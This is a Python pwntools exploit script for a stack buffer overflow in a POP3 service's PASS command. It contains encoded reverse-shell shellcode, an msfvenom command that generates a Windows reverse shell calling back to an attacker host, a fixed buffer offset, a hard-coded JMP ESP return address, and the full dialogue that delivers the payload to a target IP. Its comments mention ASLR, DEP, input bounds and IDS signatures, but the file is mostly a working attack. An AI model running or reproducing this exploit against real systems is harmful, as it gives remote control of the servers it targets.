# Proof-of-concept stack-buffer-overflow client for a POP3 service (port 110).
# The comments below describe what each stage does and which standard
# mitigations or checks would stop it, so the file also reads as a
# detection/hardening reference, not only as an exploit.
from pwn import *
# The connection is opened before log_level is set, so the initial connect is
# not logged at debug level; set context.log_level first if that output is wanted.
p = remote("192.168.0.79",110)
context.log_level = "debug"
context.arch = "i386"  # p32() below therefore emits a 4-byte little-endian address
# Second-stage payload bytes. Per the msfvenom line further down this is a
# windows/shell_reverse_tcp stage encoded to avoid \x00, \x0a and \x0d,
# presumably because NUL/LF/CR would cut a line-based POP3 argument short.
# Nothing in this file records which LHOST/LPORT the stage calls back to.
buf = b""
buf += b"\xb8\xdc\xec\x24\xd3\xd9\xe5\xd9\x74\x24\xf4\x5b"
buf += b"\x2b\xc9\xb1\x52\x31\x43\x12\x03\x43\x12\x83\x37"
buf += b"\x10\xc6\x26\x3b\x01\x85\xc9\xc3\xd2\xea\x40\x26"
buf += b"\xe3\x2a\x36\x23\x54\x9b\x3c\x61\x59\x50\x10\x91"
buf += b"\xea\x14\xbd\x96\x5b\x92\x9b\x99\x5c\x8f\xd8\xb8"
buf += b"\xde\xd2\x0c\x1a\xde\x1c\x41\x5b\x27\x40\xa8\x09"
buf += b"\xf0\x0e\x1f\xbd\x75\x5a\x9c\x36\xc5\x4a\xa4\xab"
buf += b"\x9e\x6d\x85\x7a\x94\x37\x05\x7d\x79\x4c\x0c\x65"
buf += b"\x9e\x69\xc6\x1e\x54\x05\xd9\xf6\xa4\xe6\x76\x37"
buf += b"\x09\x15\x86\x70\xae\xc6\xfd\x88\xcc\x7b\x06\x4f"
buf += b"\xae\xa7\x83\x4b\x08\x23\x33\xb7\xa8\xe0\xa2\x3c"
buf += b"\xa6\x4d\xa0\x1a\xab\x50\x65\x11\xd7\xd9\x88\xf5"
buf += b"\x51\x99\xae\xd1\x3a\x79\xce\x40\xe7\x2c\xef\x92"
buf += b"\x48\x90\x55\xd9\x65\xc5\xe7\x80\xe1\x2a\xca\x3a"
buf += b"\xf2\x24\x5d\x49\xc0\xeb\xf5\xc5\x68\x63\xd0\x12"
buf += b"\x8e\x5e\xa4\x8c\x71\x61\xd5\x85\xb5\x35\x85\xbd"
buf += b"\x1c\x36\x4e\x3d\xa0\xe3\xc1\x6d\x0e\x5c\xa2\xdd"
buf += b"\xee\x0c\x4a\x37\xe1\x73\x6a\x38\x2b\x1c\x01\xc3"
buf += b"\xbc\xe3\x92\xcb\x6e\x8c\x18\xcb\x8f\xf5\x94\x2d"
buf += b"\xe5\x15\xf1\xe6\x92\x8c\x58\x7c\x02\x50\x77\xf9"
buf += b"\x04\xda\x74\xfe\xcb\x2b\xf0\xec\xbc\xdb\x4f\x4e"
buf += b"\x6a\xe3\x65\xe6\xf0\x76\xe2\xf6\x7f\x6b\xbd\xa1"
buf += b"\x28\x5d\xb4\x27\xc5\xc4\x6e\x55\x14\x90\x49\xdd"
buf += b"\xc3\x61\x57\xdc\x86\xde\x73\xce\x5e\xde\x3f\xba"
buf += b"\x0e\x89\xe9\x14\xe9\x63\x58\xce\xa3\xd8\x32\x86"
buf += b"\x32\x13\x85\xd0\x3a\x7e\x73\x3c\x8a\xd7\xc2\x43"
buf += b"\x23\xb0\xc2\x3c\x59\x20\x2c\x97\xd9\x50\x67\xb5"
buf += b"\x48\xf9\x2e\x2c\xc9\x64\xd1\x9b\x0e\x91\x52\x29"
buf += b"\xef\x66\x4a\x58\xea\x23\xcc\xb1\x86\x3c\xb9\xb5"
buf += b"\x35\x3c\xe8"
#msfvenom -a x86 --platform windows -p windows/shell_reverse_tcp LHOST={Attacker IP} LPORT={Liverse_Shell_PORT} -f python -b "\x00\x0a\x0d" -o shellcode
# Padding that fills the vulnerable buffer up to the saved return address.
# The offset (2606) is specific to one build of the target service; a server
# that bounds the PASS argument length rejects this before any overwrite.
buffer = b"\x41" * 2606 # Offset : 2606
# Short NOP sled between the return address and the stage, so the jump does
# not have to land exactly on the first stage byte.
NOP = b"\x90" * 16 #NOP_SLED
# Hard-coded address of a JMP ESP instruction in the target process (the
# module it comes from is not recorded here). A fixed address like this only
# works when that module is loaded without ASLR, and jumping into stack data
# only works when DEP/NX is off for the process; either mitigation defeats it.
gadget = 0x5F4A358F #JMP_ESP : 0x5F4A358F
# Wire layout: [2606 x 'A'][4-byte return address][16 x NOP][351-byte stage],
# roughly 3 KB in total.
exploit = buffer + p32(gadget) + NOP + buf
# POP3 dialogue: wait for the banner, send USER, wait for the reply, then
# deliver the oversized argument in the PASS command.
# Detection note: a PASS line of about 3 KB dominated by runs of 0x41 and
# 0x90 is an easy signature for network IDS or server-side input validation.
p.recvuntil("OK POP3")
p.send(b"USER Attacker " + b'\r\n')
print(p.recvline())
print("..Send Payload..")
p.recvuntil("welcome")
p.send(b"PASS " + exploit + b'\r\n')
# Hands this socket to the user. If the stage is the reverse_tcp payload named
# in the msfvenom line, it connects out to LHOST/LPORT rather than answering
# on this connection, so nothing useful is expected to arrive on p.
p.interactive()